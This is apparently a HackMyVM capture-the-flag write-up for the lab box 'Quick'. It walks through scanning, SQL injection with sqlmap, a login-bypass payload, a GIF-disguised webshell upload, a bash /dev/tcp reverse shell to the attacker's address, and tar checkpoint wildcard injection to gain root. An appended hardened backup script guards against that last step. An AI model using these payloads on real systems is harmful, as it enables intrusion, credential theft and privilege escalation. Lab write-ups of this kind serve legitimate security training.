[HackMyVm] Quick

kali:192.168.56.104

Host discovery

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:2c:4f:35       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:aa:84:13       PCS Systemtechnik GmbH

Target: 192.168.56.113

Port scan

nmap 192.168.56.113
22/tcp open  ssh
80/tcp open  http

Directory scan

gobuster dir -u http://192.168.56.113 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images               (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 51414]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules              (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/careers              (Status: 301) [Size: 318] [--> http://192.168.56.113/careers/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib                  (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer             (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html             (Status: 200) [Size: 5014]
/robots.txt           (Status: 200) [Size: 32]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]
/employee             (Status: 301) [Size: 319] [--> http://192.168.56.113/employee/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

Compared with the earlier boxes in the Quick series, there is an extra employee directory.

Testing shows that 123@qq.com and 123@qq.com'# give the same result, while 123@qq.com' throws an error, so there is SQL injection.

Feed the captured request to sqlmap:

sqlmap -l a.txt --batch --dbs
...
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

sqlmap -l a.txt --batch -D quick --tables
...
+-------+
| cars  |
| users |
+-------+

sqlmap -l a.txt --batch -D quick -T users --columns
+-----------------+-------------------------------------+
| Column          | Type                                |
+-----------------+-------------------------------------+
| name            | varchar(255)                        |
| role            | enum('admin','employee','customer') |
| email           | varchar(255)                        |
| id              | int                                 |
| password        | varchar(255)                        |
| profile_picture | varchar(255)                        |
+-----------------+-------------------------------------+
 
sqlmap -l a.txt --batch -D quick -T users -C "email,name,password,profile_picture" --dump

+------------------------+--------------+--------------------+----------------------+
| email                  | name         | password           | profile_picture      |
+------------------------+--------------+--------------------+----------------------+
| a.lucky@email.hmv      | Anna Lucky   | c1P35bcdw0mF3ExJXG | <blank>              |
| andrew.speed@quick.hmv | Andrew Speed | o30VfVgts73ibSboUP | uploads/3_andrew.jpg |
+------------------------+--------------+--------------------+----------------------+

Only a few rows were dumped and nothing useful turned up; the passwords do not work for logging in either.

But the login page can be bypassed with a universal password:

1' or 1#

Found an upload point.

Uploading a one-line webshell gives the message:

 Invalid file type. Only JPEG, PNG, and GIF files are allowed.

Prepending a GIF file header makes the upload succeed.

Based on uploads/3_andrew.jpg from the database dump, the uploaded avatar is presumably stored there.

Trying values for the leading number, 2 turned up the uploaded file.

Reverse shell

0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'
www-data@quick4:/home$ ls
ls
andrew
coos
jeff
john
juan
lara
lee
mike
nick
user.txt

user.txt is in the home directory.

While inspecting processes, noticed:

CMD: UID=0    PID=26400  | /bin/bash /usr/local/bin/backup.sh 

backup.sh runs with root privileges.

www-data@quick4:/var/www$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

Reference: Linux privilege escalation series - tar - Juejin (juejin.cn)

cd /var/www/html
echo "chmod u+s /usr/bin/bash" >shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
bash -p
www-data@quick4:/var/www/html$ echo "chmod u+s /usr/bin/bash" >shell.sh
echo "chmod u+s /usr/bin/bash" >shell.sh
www-data@quick4:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
<l$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@quick4:/var/www/html$ echo "" > "--checkpoint=1"
echo "" > "--checkpoint=1"
www-data@quick4:/var/www/html$ bash =p
bash =p
bash: =p: No such file or directory
www-data@quick4:/var/www/html$ bash -p
bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
whoami]
bash: line 2: whoami]: command not found
whoami
root
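As an added defender-side example (not the box's own script and not from the walkthrough), this hardened replacement for backup.sh removes the wildcard that made the checkpoint trick possible and adds a check that flags option-like filenames in the web root; the paths in the comments are placeholders.

```shell
#!/bin/sh
# Hardened replacement for the page's /usr/local/bin/backup.sh (added example,
# not the box's own script). The original did "cd /var/www/html; tar czf ... *",
# so any file the web user could create whose name starts with "--" became
# a tar option. Two changes close that hole:
#   1. no shell glob: tar gets "-C <dir> .", so every entry is "./name" and a
#      planted "--checkpoint-action=..." file is just data to be archived;
#   2. source and destination are explicit, quoted arguments.
set -eu

# safe_backup SRC_DIR DEST_ARCHIVE  -> 0 on success, 1 if SRC_DIR is missing
safe_backup() {
    src=$1
    dest=$2
    [ -d "$src" ] || return 1
    # The "./" prefix guarantees no member name can start with "-", so tar
    # never parses web-root contents as options, whatever they are called.
    tar -czf "$dest" -C "$src" .
}

# list_option_like_names DIR
# Detection helper: prints top-level entries whose name starts with "-".
# A web root has no legitimate use for such names, so any hit is a strong
# indicator that a wildcard-injection payload has been staged.
list_option_like_names() {
    dir=$1
    for f in "$dir"/-*; do
        [ -e "$f" ] && basename "$f"
    done
    return 0
}

# count_option_like_names DIR -> number of such entries, handy for alerting
count_option_like_names() {
    list_option_like_names "$1" | wc -l | tr -d ' '
}

# Example run (paths are placeholders):
#   safe_backup /var/www/html /var/backups/backup-website.tar.gz
#   [ "$(count_option_like_names /var/www/html)" = 0 ] || echo "ALERT: option-like names in web root"
```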
